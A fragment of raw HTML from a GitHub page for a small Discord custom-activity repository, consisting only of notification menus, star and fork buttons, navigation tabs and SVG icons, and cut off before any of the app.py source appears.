fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-list"> <form data-target="notifications-list-subscription-form.form" data-action="submit:notifications-list-subscription-form#submitForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="3ZqUffXIzoqG5w2XIHAesd3nzNWGsbYI14zeB/aLcycZrWVHDOzMus5mw4ZYgydJy3bl9mjcHNRNkIxbtVYSrA==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <button type="submit" name="do" value="included" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="true" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Participating and @mentions </div> <div class="text-small color-text-secondary text-normal pb-1"> Only receive notifications from this repository when participating or @mentioned. </div> </div> </button> <button type="submit" name="do" value="subscribed" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> All Activity </div> <div class="text-small color-text-secondary text-normal pb-1"> Notified of all notifications on this repository. </div> </div> </button> <button type="submit" name="do" value="ignore" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Ignore </div> <div class="text-small color-text-secondary text-normal pb-1"> Never be notified. </div> </div> </button> </form> <button class="SelectMenu-item flex-items-start pr-3" type="button" role="menuitemradio" data-target="notifications-list-subscription-form.customButton" data-action="click:notifications-list-subscription-form#openCustomDialog" aria-haspopup="true" aria-checked="false" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="d-flex flex-items-start flex-justify-between"> <div class="f5 text-bold">Custom</div> <div class="f5 pr-1"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-right"> <path fill-rule="evenodd" d="M8.22 2.97a.75.75 0 011.06 0l4.25 4.25a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06-1.06l2.97-2.97H3.75a.75.75 0 010-1.5h7.44L8.22 4.03a.75.75 0 010-1.06z"></path> </svg> </div> </div> <div class="text-small color-text-secondary text-normal pb-1"> Select events you want to be notified of in addition to participating and @mentions. </div> </div> </button> <div class="px-3 py-2 d-flex color-bg-secondary flex-items-center"> <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile SelectMenu-icon SelectMenu-icon--device-mobile"> <path fill-rule="evenodd" d="M3.75 0A1.75 1.75 0 002 1.75v12.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 14.25V1.75A1.75 1.75 0 0012.25 0h-8.5zM3.5 1.75a.25.25 0 01.25-.25h8.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25V1.75zM8 13a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> <span className="text-small color-text-secondary text-normal pb-1"> Get push notifications on <a target="_blank" rel="noopener noreferrer" href="https://apps.apple.com/app/apple-store/id1477376905?ct=watch-dropdown&amp;mt=8&amp;pt=524675">iOS</a> or <a target="_blank" rel="noopener noreferrer" href="https://play.google.com/store/apps/details?id=com.github.android&amp;referrer=utm_campaign%3Dwatch-dropdown%26utm_medium%3Dweb%26utm_source%3Dgithub">Android</a>. </span> </div> </div> </div> </details-menu> <details-dialog class="notifications-component-dialog " data-target="notifications-list-subscription-form.customDialog" hidden> <div class="SelectMenu-modal notifications-component-dialog-modal overflow-visible"> <form data-target="notifications-list-subscription-form.customform" data-action="submit:notifications-list-subscription-form#submitCustomForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="B5KeWY/J7AWLIwERLJheXkUJmk2gzdVgu6NQMebrvkjDpW9jdu3uNcOizwBUa2emU5izbk6gf7whvwJtpTbfww==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <header class="d-sm-none SelectMenu-header pb-0 border-bottom-0 px-2 px-sm-3"> <h1 class="f3 SelectMenu-title d-inline-flex"> <button class="color-bg-primary border-0 px-2 py-0 m-0 Link--secondary f5" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> Custom </h1> </header> <header class="d-none d-sm-flex flex-items-start pt-1"> <button class="border-0 px-2 pt-1 m-0 Link--secondary f5" style="background-color: transparent;" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg style="position: relative; left: 2px; top: 1px" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> <h1 class="pt-1 pr-4 pb-0 pl-0 f5 text-bold"> Custom </h1> </header> <fieldset> <legend> <div class="text-small color-text-secondary pt-0 pr-3 pb-3 pl-6 pl-sm-5 border-bottom mb-3"> Select events you want to be notified of in addition to participating and @mentions. </div> </legend> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Issue" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Issues </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="PullRequest" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Pull requests </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Release" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Releases </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Discussion" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Discussions </label> <span class="tooltipped tooltipped-nw mr-2 p-1 float-right" aria-label="Discussions are not enabled for this repo"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-info color-icon-secondary"> <path fill-rule="evenodd" d="M8 1.5a6.5 6.5 0 100 13 6.5 6.5 0 000-13zM0 8a8 8 0 1116 0A8 8 0 010 8zm6.5-.25A.75.75 0 017.25 7h1a.75.75 0 01.75.75v2.75h.25a.75.75 0 010 1.5h-2a.75.75 0 010-1.5h.25v-2h-.25a.75.75 0 01-.75-.75zM8 6a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="SecurityAlert" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Security alerts </label> </div> </fieldset> <div class="pt-2 pb-3 px-3 d-flex flex-justify-start flex-row-reverse"> <button type="submit" name="do" value="custom" class="btn btn-sm btn-primary ml-2" data-target="notifications-list-subscription-form.customSubmit" disabled >Apply</button> <button data-action="click:notifications-list-subscription-form#resetForm" data-close-dialog="" type="button" data-view-component="true" class="btn-sm btn"> Cancel </button> </div> </form> </div> </details-dialog> <div class="notifications-component-dialog-overlay"></div> </details> <a class="social-count" href="/agambajwa/discord-custom-activity/watchers" aria-label="1 user is watching this repository" data-target="notifications-list-subscription-form.socialCount" > 1 </a> </notifications-list-subscription-form> </li> <li> <div class="d-block js-toggler-container js-social-container starring-container "> <form class="starred js-social-form" action="/agambajwa/discord-custom-activity/unstar" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="aDCHwYWaKLqsiSpgtNmgiE7iFJLWTNM0XuVEDy07yVMAH8JGuspOc2NzboCj53rrQUivnEYrO1vElQnYTWLEfA==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Unstar this repository" title="Unstar agambajwa/discord-custom-activity" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;UNSTAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="26b99205bc3675fed3a1976bc898e3bc2cf139c2bf84883a16c605f8312c2605" data-ga-click="Repository, click unstar button, action:blob#show; text:Unstar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star-fill mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25z"></path> </svg> <span data-view-component="true"> Unstar </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> <form class="unstarred js-social-form" action="/agambajwa/discord-custom-activity/star" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="WoX2iMic/750KwGaNF8YrDLWLPEQJnCPcPCz4SryCz67Y7zkkhN7pPCZ5FbCK6VDYEedSzBa9QWGpe4R8A4A4g==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Star this repository" title="Star agambajwa/discord-custom-activity" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;STAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="6091699887b522ca30716b30e93c3c8d1789a533a28ac89051279995fc6c1426" data-ga-click="Repository, click star button, action:blob#show; text:Star"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path> </svg> <span data-view-component="true"> Star </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> </div> </li> <li> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="btn-with-count" action="/agambajwa/discord-custom-activity/fork" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="LG1tFKmIMavvvvfRBm0nTg7LfURRXhS1QlnyAmllPMXfqoHfrOevppdpK/WxXJQNgPSh+giRgFOOJpHKp2CARw==" /> <button class="btn btn-sm btn-with-count" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FORK_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="2ba6ea3d9c8e61dc4d6567d82e92d7c83e88483a640612fef5c5ac71c19d1eef" data-ga-click="Repository, show fork modal, action:blob#show; text:Fork" type="submit" title="Fork your own copy of agambajwa/discord-custom-activity to your account" aria-label="Fork your own copy of agambajwa/discord-custom-activity to your account"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path> </svg> Fork </button></form> <a href="/agambajwa/discord-custom-activity/network/members" class="social-count" aria-label="0 users forked this repository"> 0 </a> </li> </ul> </div> <div id="responsive-meta-container" data-pjax-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/agambajwa/discord-custom-activity" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" data-hotkey="g c" data-ga-click="Repository, Navigation click, Code tab" data-pjax="#repo-content-pjax-container" aria-current="page" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-content="Code">Code</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="issues-tab" href="/agambajwa/discord-custom-activity/issues" data-tab-item="i1issues-tab" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" data-hotkey="g i" data-ga-click="Repository, Navigation click, Issues tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path> </svg> <span data-content="Issues">Issues</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="pull-requests-tab" href="/agambajwa/discord-custom-activity/pulls" data-tab-item="i2pull-requests-tab" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" data-hotkey="g p" data-ga-click="Repository, Navigation click, Pull requests tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path> </svg> <span data-content="Pull requests">Pull requests</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="actions-tab" href="/agambajwa/discord-custom-activity/actions" data-tab-item="i3actions-tab" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" data-hotkey="g a" data-ga-click="Repository, Navigation click, Actions tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path> </svg> <span data-content="Actions">Actions</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="projects-tab" href="/agambajwa/discord-custom-activity/projects" data-tab-item="i4projects-tab" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" data-hotkey="g b" data-ga-click="Repository, Navigation click, Projects tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <span data-content="Projects">Projects</span> <span title="0" hidden="hidden" data-view-component="true" class="Counter">0</span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="wiki-tab" href="/agambajwa/discord-custom-activity/wiki" data-tab-item="i5wiki-tab" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" data-hotkey="g w" data-ga-click="Repository, Navigation click, Wikis tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path> </svg> <span data-content="Wiki">Wiki</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="security-tab" href="/agambajwa/discord-custom-activity/security" data-tab-item="i6security-tab" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" data-hotkey="g s" data-ga-click="Repository, Navigation click, Security tab" data-pjax="#repo-content-pjax-container" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path> </svg> <span data-content="Security">Security</span> <include-fragment src="/agambajwa/discord-custom-activity/security/overall-count" accept="text/fragment+html"></include-fragment> </a></li> <li data-view-component="true" class="d-inline-flex"> <a id="insights-tab" href="/agambajwa/discord-custom-activity/pulse" data-tab-item="i7insights-tab" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" data-ga-click="Repository, Navigation click, Insights tab" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path> </svg> <span data-content="Insights">Insights</span> <span title="Not available" data-view-component="true" class="Counter"></span> </a></li> </ul> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> <span class="sr-only">More</span> </div> </summary> <div data-view-component="true"> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> <ul> <li data-menu-item="i0code-tab" hidden> <a role="menuitem" class="js-selected-navigation-item selected dropdown-item" aria-current="page" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" href="/agambajwa/discord-custom-activity"> Code </a> </li> <li data-menu-item="i1issues-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_issues repo_labels repo_milestones /agambajwa/discord-custom-activity/issues" href="/agambajwa/discord-custom-activity/issues"> Issues </a> </li> <li data-menu-item="i2pull-requests-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_pulls checks /agambajwa/discord-custom-activity/pulls" href="/agambajwa/discord-custom-activity/pulls"> Pull requests </a> </li> <li data-menu-item="i3actions-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_actions /agambajwa/discord-custom-activity/actions" href="/agambajwa/discord-custom-activity/actions"> Actions </a> </li> <li data-menu-item="i4projects-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_projects new_repo_project repo_project /agambajwa/discord-custom-activity/projects" href="/agambajwa/discord-custom-activity/projects"> Projects </a> </li> <li data-menu-item="i5wiki-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_wiki /agambajwa/discord-custom-activity/wiki" href="/agambajwa/discord-custom-activity/wiki"> Wiki </a> </li> <li data-menu-item="i6security-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="security overview alerts policy token_scanning code_scanning /agambajwa/discord-custom-activity/security" href="/agambajwa/discord-custom-activity/security"> Security </a> </li> <li data-menu-item="i7insights-tab" hidden> <a role="menuitem" class="js-selected-navigation-item dropdown-item" data-selected-links="repo_graphs repo_contributors dependency_graph dependabot_updates pulse people community /agambajwa/discord-custom-activity/pulse" href="/agambajwa/discord-custom-activity/pulse"> Insights </a> </li> </ul> </details-menu></div> </details></div> </nav> </div> <div class="clearfix new-discussion-timeline container-xl px-3 px-md-4 px-lg-5"> <div id="repo-content-pjax-container" class="repository-content " > <a href="https://github.dev/" class="d-none js-github-dev-shortcut" data-hotkey=".,E,c o d e">Open in github.dev</a> <div> <a class="d-none js-permalink-shortcut" data-hotkey="y" href="/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">Permalink</a> <!-- blob contrib key: blob_contributors:v22:13522820112eb6c6400625101636e4def06f02593a899cf92e79c023ce6ed737 --> <div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="details-reset details-overlay mr-0 mb-0 " id="branch-select-menu"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path fill-rule="evenodd" d="M11.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122V6A2.5 2.5 0 0110 8.5H6a1 1 0 00-1 1v1.128a2.251 